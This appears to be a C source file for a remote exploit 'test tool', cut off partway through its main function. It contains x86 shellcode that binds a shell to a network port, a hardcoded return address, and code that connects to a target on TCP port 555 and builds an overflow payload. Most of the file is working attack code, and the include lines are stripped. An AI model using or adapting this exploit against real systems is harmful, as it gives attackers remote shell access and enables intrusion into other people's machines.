/* * exploit_probe test tool * * *** PRIVATE -- DO NOT DISTRIBUTE *** * * compile with gcc -g -Wall -o exploit_probe exploit_probe.c * */ /* includes */ #include #include #include #include #include #include #include #include //#include #include #include #if defined (__OpenBSD__) || defined (__NetBSD__) #include #endif /* defines*/ #define VERSION "1.0" #define MAXBUF 8192 // shellcode char shellcode[]= // binds a port to a shell "\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0" "\x66\xcd\x80\x89\xc6\x52\x68\xbb\x02" "\x11\x5c" // <-- this is the port value "\x89\xe1\x6a\x10\x51" "\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04\xb0" "\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3" "\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" "\xe1\xb0\x0b\xcd\x80"; char retcode[]="\x80\xed\xff\xbf"; void usage(char *prog) { fprintf(stderr,"USAGE: "); fprintf(stderr,"%s \n\n",prog); } /* main */ int main(int argc, char **argv) { int i=0, j=0, k=0; struct sockaddr_in address; struct hostent *hp; int result = 1; char ch; int sockfd; int size; char *prog; char buffer[MAXBUF]; prog = argv[0]; printf("Remote Exploit Test Tool, v%s\n",VERSION); printf("Simple Nomad \n\n"); if(argc <= 2) { usage(prog); exit(-1); } size = (int)strtol(argv[1],NULL,10); hp = gethostbyname(argv[2]); if (hp == NULL) { printf("Unable to resolve %s, unknown host\n", argv[2]); exit(-1); } sockfd = socket(AF_INET, SOCK_STREAM, 0); address.sin_family = AF_INET; address.sin_addr = *(struct in_addr *)*hp->h_addr_list; address.sin_port = htons(555); // tcp port printf("[+] Connecting to host\n"); result = connect(sockfd, (struct sockaddr *)&address, sizeof(address)); if (result == -1) { printf("[!] Unable to connect to server %s\n",argv[2]); exit(1); } printf("[+] Connected\n"); printf("[+] Building payload of %d length\n",size); for(i=0; i